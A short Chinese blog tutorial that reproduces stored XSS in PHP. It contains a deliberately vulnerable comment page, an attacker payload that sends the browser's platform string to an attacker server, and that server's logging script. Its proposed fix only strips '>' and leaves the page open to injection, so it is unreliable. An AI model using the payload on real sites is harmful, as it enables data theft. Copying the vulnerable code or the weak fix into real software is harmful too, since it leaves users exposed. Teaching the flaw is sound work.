存储型 XSS 原理复现

存储型 XSS 原理复现


漏洞最少会影响 3 个逻辑实体:

  • 受害者浏览器
  • 攻击者服务器
  • Web 应用服务器
  • Web 应用数据库(可有可无)

制作漏洞

Web 应用服务器:

<?php
    // 显示多个用户的评论
    // 获取用户提交的评论,并存储
    $file = fopen('comment.txt','a');
    fwrite($file,$_GET['comment'].'<br/>');
    fclose($file);

    // 在页面中显示所有评论
    echo '<h1>元芳,你怎么看</h1>';
    $file = fopen('comment.txt','r');
    fpassthru($file);
?>

利用漏洞

攻击者提交的评论:

http://172.168.30.78:8080/?comment=
<script>var ele=document.createElement('img');ele.src="http://172.168.30.78:8080/hack.php?info=" + navigator.platform;</script>

攻击者的服务器:

<?php
    $info = $_GET['info'];
    $file = fopen('1.txt','a');
    fwrite($file,$info);
?>

修复漏洞

应用服务器:

<?php
    // 显示多个用户的评论
    // 获取用户提交的评论,并存储
    $file = fopen('comment.txt','a');
    fwrite($file,str_replace('>','',$_GET['comment']).'<br/>');
    fclose($file);

    // 在页面中显示所有评论
    echo '<h1>元芳,你怎么看</h1>';
    $file = fopen('comment.txt','r');
    fpassthru($file);
?>
posted @ 2020-12-24 13:53  室外  阅读(270)  评论(0编辑  收藏  举报